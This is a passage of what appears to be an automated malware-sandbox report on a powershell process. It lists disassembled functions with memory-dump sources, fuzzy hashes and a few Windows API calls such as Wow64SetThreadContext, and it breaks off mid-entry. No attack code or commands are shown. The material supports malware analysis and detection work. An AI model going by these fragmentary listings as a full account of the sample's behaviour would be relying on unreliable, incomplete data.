                                                                        • API String ID: 983334009-0
                                                                        • Opcode ID: e7840e2345dbf954024dd68395303f740f2e7505eefc3144d731bf6292698137
                                                                        • Instruction ID: 371789d9a91c6ac0eddc7bd1ba7c6c157b89c1bc47d01d9377471115a673c545
                                                                        • Opcode Fuzzy Hash: e7840e2345dbf954024dd68395303f740f2e7505eefc3144d731bf6292698137
                                                                        • Instruction Fuzzy Hash: BA215971D003098FDB10DFAAC8857EEBBF4AF88324F14842ED559A7240CB799944CFA5
                                                                        Function 06D9EF90 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06D9F00E
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3294202856.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_6d90000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID: ContextThreadWow64
                                                                        • String ID:
                                                                        • API String ID: 983334009-0
                                                                        • Opcode ID: b166d26e7b98df1f8e3c1256eef8f011ab3f358c9788fab2f1935eff6e698e60
                                                                        • Instruction ID: ca6d7ad6891e5aa8e58ca15df2ffc673797d1155b89a1f6bfeba9c7be9875823
                                                                        • Opcode Fuzzy Hash: b166d26e7b98df1f8e3c1256eef8f011ab3f358c9788fab2f1935eff6e698e60
                                                                        • Instruction Fuzzy Hash: A3212971D003098FDB50DFAAC4857EEBBF4EF88324F14842AD559A7240DB78A944CFA5
                                                                        Function 06D4D930 Relevance: 1.6, APIs: 1, Instructions: 58fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • MapViewOfFile.KERNELBASE(?,?,?,?,?), ref: 06D4D9A6
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3293808970.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_6d40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID: FileView
                                                                        • String ID:
                                                                        • API String ID: 3314676101-0
                                                                        • Opcode ID: 637cc1e9ee46c29a231baf10bd4e8cac858c7ae4c85569501046e0a2f4893a19
                                                                        • Instruction ID: 895c43e9555706f987c8ecb93ff91412a47f6ae16569917b894e3d8c1a902c99
                                                                        • Opcode Fuzzy Hash: 637cc1e9ee46c29a231baf10bd4e8cac858c7ae4c85569501046e0a2f4893a19
                                                                        • Instruction Fuzzy Hash: 291147768002499FDB20DFAAC845BEFBFF5AF88320F148819E559A7210CB759954CFA1
                                                                        Function 06D4D938 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • MapViewOfFile.KERNELBASE(?,?,?,?,?), ref: 06D4D9A6
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3293808970.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_6d40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID: FileView
                                                                        • String ID:
                                                                        • API String ID: 3314676101-0
                                                                        • Opcode ID: 9d7298d7a30fe1fe3222e568bd22b80c069ed5ac1e22bd4d2453a0a624680bd8
                                                                        • Instruction ID: c09ed3a24b81fd90f4c56d68c2c0fbb8bb1a5aece80479b2f3c58e402426209e
                                                                        • Opcode Fuzzy Hash: 9d7298d7a30fe1fe3222e568bd22b80c069ed5ac1e22bd4d2453a0a624680bd8
                                                                        • Instruction Fuzzy Hash: 821126728002499FDB10DFAAC845BDEBFF5AF88320F148419E519A7250CB75A950CFA1
                                                                        Function 0739629B Relevance: .7, Instructions: 741COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3297291785.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7390000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8cdf8e4e8429cd6255d52612f1a1549cc74eb0dc329907172802c197aba7954e
                                                                        • Instruction ID: 48d7961f3c56445d804c361c4929487c1982eb2eae05509b219017fdc6dcdd42
                                                                        • Opcode Fuzzy Hash: 8cdf8e4e8429cd6255d52612f1a1549cc74eb0dc329907172802c197aba7954e
                                                                        • Instruction Fuzzy Hash: 2B6258B4A01215DFEB24CB58C955B69B7B2EF85304F14C0A9E90DAB392DB32ED81CF51
                                                                        Function 07396DEB Relevance: .6, Instructions: 574COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3297291785.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7390000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 85f033435497b32b560b0351b003a73e1d15a21f8d37bd37bad63b29eabbcfb5
                                                                        • Instruction ID: fea5ed08133e759ec811cd0aa802f8116498ced05822d74a51ff345e87bd5b21
                                                                        • Opcode Fuzzy Hash: 85f033435497b32b560b0351b003a73e1d15a21f8d37bd37bad63b29eabbcfb5
                                                                        • Instruction Fuzzy Hash: AF4247B4A01215DFEB24CB18C955B69B7B2EF89304F14C0A9E90D9B392DB72ED81CF51
                                                                        Function 0739D5C5 Relevance: .5, Instructions: 477COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3297291785.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7390000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2aa1619983693316980018ab1e6875c55cf6f68de59db80e93162684963265d8
                                                                        • Instruction ID: 782762dac631ded37cd1893be120c59e236732439c49a7f934ef7f98ee05005e
                                                                        • Opcode Fuzzy Hash: 2aa1619983693316980018ab1e6875c55cf6f68de59db80e93162684963265d8
                                                                        • Instruction Fuzzy Hash: B31280B4B10215DFEB24DB58C855B6AB7A2BF84304F54C0A9D90DAB391CB71ED82CF91
                                                                        Function 06D657A5 Relevance: .3, Instructions: 338COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3294041535.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_6d60000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ac54617314c5fdb861399c86e5b99d5f45cd9653e3c4cefb24430c87ec0e3112
                                                                        • Instruction ID: 2966fb689dc20db76611f7a45987f0298c2aa3e3e509d79b48a6071cdfd0c2a5
                                                                        • Opcode Fuzzy Hash: ac54617314c5fdb861399c86e5b99d5f45cd9653e3c4cefb24430c87ec0e3112
                                                                        • Instruction Fuzzy Hash: 5FB12A31F14245CFDB558B6AE84067ABBF1EFC6220B2881ABE545CB251DB32D8C5C7A1
                                                                        Function 00DACE20 Relevance: .3, Instructions: 324COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3262145277.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_da0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5fcf3935c54f4ff2b12e5754f82d81179114a94ac2e594bea0a1affcb892105e
                                                                        • Instruction ID: d008341990f11ec0a809b0ed0ed8b5d8d81fae792d592f8759458f62f04eb2c1
                                                                        • Opcode Fuzzy Hash: 5fcf3935c54f4ff2b12e5754f82d81179114a94ac2e594bea0a1affcb892105e
                                                                        • Instruction Fuzzy Hash: F8D14974A01218DFDB05CFA8D480A9DFBF2EF89310F24815AE445AB361CB71ED46CBA4
                                                                        Function 06D65A80 Relevance: .3, Instructions: 284COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3294041535.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_6d60000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 98b1218170ce50bf26b594969c22c449f9b4de27b14f16a9eb85eac0f7aac6ff
                                                                        • Instruction ID: 1acf5316af179a5b7115ad6a44041bdeffa06cf9e1bf236e2c37d36ef660986d
                                                                        • Opcode Fuzzy Hash: 98b1218170ce50bf26b594969c22c449f9b4de27b14f16a9eb85eac0f7aac6ff
                                                                        • Instruction Fuzzy Hash: 78910931F00209CFDB559F6AE8147AABBB2EFC5310F1881AAE545CB291DB31C895CB91
                                                                        Function 07390488 Relevance: .2, Instructions: 160COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3297291785.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7390000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8dbfb08b36201c2d336ca2223c1e842d07a36a502b687c27773a4ad59d783051
                                                                        • Instruction ID: 55a5926f35d508e59f6f860f52a588dd5fa6ba705498aae27d5efd0788367727
                                                                        • Opcode Fuzzy Hash: 8dbfb08b36201c2d336ca2223c1e842d07a36a502b687c27773a4ad59d783051
                                                                        • Instruction Fuzzy Hash: F75126F0B08217EFEF199A78881076A7FA6AFC2250F548076D549CB292DB75CD41C7A2
                                                                        Function 07391F20 Relevance: .1, Instructions: 139COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3297291785.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7390000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5e4bc891bfd76d47b9943cadf20398269b7456378fe2280656f012115f59abfa
                                                                        • Instruction ID: 3b7faceedaad5acacd089649e0b22a0ba478e65d91467fb8afd955f3bc1daf3a
                                                                        • Opcode Fuzzy Hash: 5e4bc891bfd76d47b9943cadf20398269b7456378fe2280656f012115f59abfa
                                                                        • Instruction Fuzzy Hash: 77412AB1B0520F9FFB299668D800667BBA6AFC5610B2481BBD64ACB741EB32CC41C351
                                                                        Function 06D65545 Relevance: .1, Instructions: 130COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3294041535.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_6d60000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a7641d5cbf21103332550f39c6ff226a14088ae4e1b810c9191be4e049a4f454
                                                                        • Instruction ID: 94a0939c95ebcc101de243a4ac3d06d13b1e40c4244afa2462ab09bdc5cfdcb1
                                                                        • Opcode Fuzzy Hash: a7641d5cbf21103332550f39c6ff226a14088ae4e1b810c9191be4e049a4f454
                                                                        • Instruction Fuzzy Hash: 3241D230B00108DFCB08DF98D954B6E7BE2AFC9750BA48059E905AB351DB71EC82D7A2
                                                                        Function 06DB7068 Relevance: .1, Instructions: 123COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3294416366.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_6db0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2602c81a1540ff8d5fed41a9da5195c6a66045a399caf27c309a64d60aaf4b1b
                                                                        • Instruction ID: d357c97e7d0577e6b93127b6652649db62c93b4f1cf64a07fb4ffbcc5f97c241
                                                                        • Opcode Fuzzy Hash: 2602c81a1540ff8d5fed41a9da5195c6a66045a399caf27c309a64d60aaf4b1b
                                                                        • Instruction Fuzzy Hash: A151C4B4D01208DFDB58DFB9D954ADDBBB2BF89300F20912AE416AB364DB319945CF50
                                                                        Function 00DABF19 Relevance: .1, Instructions: 120COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3262145277.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_da0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 01d8c220350dcae346c52dde4510cfbbc919ccf38c64f86c305acdb5ce8b607e
                                                                        • Instruction ID: bb248cf1a2a588d8a43900f70c39570180c2ad87b240308bf8c65d60b60ea635
                                                                        • Opcode Fuzzy Hash: 01d8c220350dcae346c52dde4510cfbbc919ccf38c64f86c305acdb5ce8b607e
                                                                        • Instruction Fuzzy Hash: 9F51C874A00209DFDB14CBA8D484AADBBF2AF89314F28D159E404AB355CB75ED86CB60
                                                                        Function 06D65580 Relevance: .1, Instructions: 105COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3294041535.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_6d60000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1aecdf4b837bde29d2190a97fc39650e392c68d2532e54ed7032b602a177f1b2
                                                                        • Instruction ID: bf28287a76b07fabb4a72a18f8e2a37a288346d749f0b6848ca9cfd531c7c5d1
                                                                        • Opcode Fuzzy Hash: 1aecdf4b837bde29d2190a97fc39650e392c68d2532e54ed7032b602a177f1b2
                                                                        • Instruction Fuzzy Hash: 44419F34700108DFCB08DF99D954A6E7BE2EFC9750B658059ED05AB350CB31ED92DBA1
                                                                        Function 07390468 Relevance: .1, Instructions: 101COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3297291785.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7390000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1e051029e6f27c58fabbcb2c0ae2cd08c4dfd978ce5e4ed00f995d6fcc441b10
                                                                        • Instruction ID: a3c4d51764a11942a4f59322e84631716f910329e8b1f6b5e3b69a9797390a9e
                                                                        • Opcode Fuzzy Hash: 1e051029e6f27c58fabbcb2c0ae2cd08c4dfd978ce5e4ed00f995d6fcc441b10
                                                                        • Instruction Fuzzy Hash: F93107F0A09303EFEF298B35C5107697BA5AF82350F948076D548DB192EB75D981CBB2
                                                                        Function 00DACDD1 Relevance: .1, Instructions: 90COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3262145277.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_da0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ba364a069618a9bc80c78af0709252a04fecabd7284975881c3da8bad563e61d
                                                                        • Instruction ID: 3a301a1662eeaf7ff15f137f0ea0d9ecf9adaf1e7d4176a0395735f3bd47e240
                                                                        • Opcode Fuzzy Hash: ba364a069618a9bc80c78af0709252a04fecabd7284975881c3da8bad563e61d
                                                                        • Instruction Fuzzy Hash: B2316274A093858FCB02DB59C8909AEBFF1EF4A310B155196E459EB363C335ED05CB62
                                                                        Function 06DBF280 Relevance: .1, Instructions: 88COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3294416366.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_6db0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e17b7fca9f7ca77ef6d232a9d0c8990b9853b6a2a5de528bd3197d274c01f56c
                                                                        • Instruction ID: e7dcae19d59510b8ea706c353706a6f470abf2dac5efc3be3e3bdd5d00db5a63
                                                                        • Opcode Fuzzy Hash: e17b7fca9f7ca77ef6d232a9d0c8990b9853b6a2a5de528bd3197d274c01f56c
                                                                        • Instruction Fuzzy Hash: E0313574E08248CFDB44DFAAC845AEEBBF2FB89304F109065D916A7348DB309A45CF91
                                                                        Function 00E1746B Relevance: .1, Instructions: 81COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3262287141.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_e10000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 92a4c20d27a86147db605721c68d48a10e9f57840b89ad5bee0ee51b1dc913b4
                                                                        • Instruction ID: b286bf7dbb6e8e465b4b15efdea7eb98e69a7e97e5b0ce9a53dbf0ca6dd22927
                                                                        • Opcode Fuzzy Hash: 92a4c20d27a86147db605721c68d48a10e9f57840b89ad5bee0ee51b1dc913b4
                                                                        • Instruction Fuzzy Hash: BF313874D082488FDB04DFA9C8483EEBFF1FB89304F20916AD559B3395DB744A859BA1
                                                                        Function 00CFD0E4 Relevance: .1, Instructions: 74COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3261803065.0000000000CFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_cfd000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4a6efe9f54ab27127837f3e38cc0d0a4eeb72806d5d1086df8de6285ee466bb7
                                                                        • Instruction ID: f83c9e99779e27e1c517bcea42ed853385323353429046f768d0163e587783e7
                                                                        • Opcode Fuzzy Hash: 4a6efe9f54ab27127837f3e38cc0d0a4eeb72806d5d1086df8de6285ee466bb7
                                                                        • Instruction Fuzzy Hash: 922137B6504348EFCB44DF14D9C0B3ABB66FB84324F24C569EA0A0B251C736D856CBA3
                                                                        Function 00E1E558 Relevance: .1, Instructions: 68COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3262287141.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_e10000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 28326bc718de22e8834cf37af42e24d31a0147c882a6d7543db2be803858c328
                                                                        • Instruction ID: 89d3bb0d14e5d2c69dadfe30b534f1c2edeb060b52bdc347c55e45079a708597
                                                                        • Opcode Fuzzy Hash: 28326bc718de22e8834cf37af42e24d31a0147c882a6d7543db2be803858c328
                                                                        • Instruction Fuzzy Hash: B92109B4D04219CBDB04DFAAD4086EEBBB6FB88315F149029E915B3354EB745A84CBA1
                                                                        Function 06DB7730 Relevance: .1, Instructions: 68COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3294416366.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_6db0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5663f8164f1aa73ca92b6e22f02130f084a5c710340330dfeac56aed1b4e5677
                                                                        • Instruction ID: b408b69df37da9446e9d801c0d88cd3c98729d9bc3985255f57ad19ccfe4e346
                                                                        • Opcode Fuzzy Hash: 5663f8164f1aa73ca92b6e22f02130f084a5c710340330dfeac56aed1b4e5677
                                                                        • Instruction Fuzzy Hash: C2213974E04209DFDB44DFA9C4456EEBBF5FF88300F5091A9D81AA7254DBB49A82CF90
                                                                        Function 00E1FDA0 Relevance: .1, Instructions: 67COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3262287141.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_e10000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 08598a78eabfdd307b7ea2143920c5a20a5cf05435c13703bb5559710facc88b
                                                                        • Instruction ID: 28dd9f1b8f890ea67445d30a85b0cda76f42a78f8202371fdf8dcc32fe6f3715
                                                                        • Opcode Fuzzy Hash: 08598a78eabfdd307b7ea2143920c5a20a5cf05435c13703bb5559710facc88b
                                                                        • Instruction Fuzzy Hash: 0F213C35A00209DBDB149FA9C458ADE7BB6EB8D320F149129E911B7390CB719C85CBA0
                                                                        Function 00DACDA7 Relevance: .1, Instructions: 66COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3262145277.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_da0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4b53dbcfb83a1fb3b06bcc12701943e5cf1b768613369a2ed5084343ad455f42
                                                                        • Instruction ID: 2604bd1de55434da75f96a477526fc8c91e5ceb514b8916b896959ff7516b8ef
                                                                        • Opcode Fuzzy Hash: 4b53dbcfb83a1fb3b06bcc12701943e5cf1b768613369a2ed5084343ad455f42
                                                                        • Instruction Fuzzy Hash: 8E214D74A04249DFCB01CF99C8909AEBBF1FF8A310B158096E814EB362C735ED41CBA1
                                                                        Function 00E137E8 Relevance: .1, Instructions: 65COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3262287141.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_e10000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9f5cdef8fdc32d882acd6e0835f3cff8c233da4c5c2c5ebeca3077463627e193
                                                                        • Instruction ID: 87e8fede4bdf5ffbb6376132629e323e69461ea8511685203a26dff7d287f9a7
                                                                        • Opcode Fuzzy Hash: 9f5cdef8fdc32d882acd6e0835f3cff8c233da4c5c2c5ebeca3077463627e193
                                                                        • Instruction Fuzzy Hash: 42210970D05208DFD748EFB9C4487EEBBF1FB49305F1091A9E009A3294DB748A84DB82
                                                                        Function 00E187A1 Relevance: .1, Instructions: 65COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3262287141.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_e10000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3677f69d338695bd97e834d6278e2e616c57e42dfb39e895250beede155a89d0
                                                                        • Instruction ID: 6ab9ab013a23b57edb6b0f783925fbd73e3f6474a72d5462db4b14dc4dbc9f88
                                                                        • Opcode Fuzzy Hash: 3677f69d338695bd97e834d6278e2e616c57e42dfb39e895250beede155a89d0
                                                                        • Instruction Fuzzy Hash: A7214770D04219CFDB04CFAAD8446EEBBB6FB89310F10952BD514F3250DB744A85CBA0
                                                                        Function 00E137E7 Relevance: .1, Instructions: 64COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3262287141.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_e10000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 83363ac53d55f9bfce2b815b729676562d2aea9fec7cf69e57ac71b497fccf7a
                                                                        • Instruction ID: 5016a7f97fc04945a8f50a47a47e1c83c0c85174c6c8495910f2efe6601897ed
                                                                        • Opcode Fuzzy Hash: 83363ac53d55f9bfce2b815b729676562d2aea9fec7cf69e57ac71b497fccf7a
                                                                        • Instruction Fuzzy Hash: 99211870D05208DFDB48EFB9D4487EEBBF1FB49304F1091A9E009A3294DB748A84DB92
                                                                        Function 00DAC080 Relevance: .1, Instructions: 64COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3262145277.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_da0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0b30b521469473831032f5fee4e0985c7570d2b1c9593841483d399a325d52c0
                                                                        • Instruction ID: 6d1cfcf62abee8b30ed2cfbcdaad845e38ac9c12da8ed7b561b815d73582da0f
                                                                        • Opcode Fuzzy Hash: 0b30b521469473831032f5fee4e0985c7570d2b1c9593841483d399a325d52c0
                                                                        • Instruction Fuzzy Hash: 4321C478A00619DFCB04DF89C9809AAFBB5FB89310B148569E909E7351C731EC51CBA0
                                                                        Function 07391F03 Relevance: .1, Instructions: 63COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3297291785.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7390000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c4470fada1dfb8bf97fdcd99d54b343f5b457ee2b95d0546e10e7d4ef0d58ac7
                                                                        • Instruction ID: 8ae55b9f659797c06190a7640c4a732ee7f5deaad15633642214356e7669a607
                                                                        • Opcode Fuzzy Hash: c4470fada1dfb8bf97fdcd99d54b343f5b457ee2b95d0546e10e7d4ef0d58ac7
                                                                        • Instruction Fuzzy Hash: AF11E6B560A34FCFFF158A14D850961BBBAFF82210B1882B7E60DDB292E735D840CB51
                                                                        Function 00DABC48 Relevance: .1, Instructions: 59COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3262145277.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_da0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8b1170b5757e0bc631f2e2e188cee3cbb9fd57de0709e7922394509508bbbca4
                                                                        • Instruction ID: 85a088362ecd1123bb8c6fd030fa23a43bfda389fb42f7d31713b7dfd9740c6e
                                                                        • Opcode Fuzzy Hash: 8b1170b5757e0bc631f2e2e188cee3cbb9fd57de0709e7922394509508bbbca4
                                                                        • Instruction Fuzzy Hash: 35212674A0050ADFCB14CF99C58096AFBF5FB89320B64855AD918E7341CB31ED92CBE0
                                                                        Function 00E187B0 Relevance: .1, Instructions: 58COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.3262287141.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
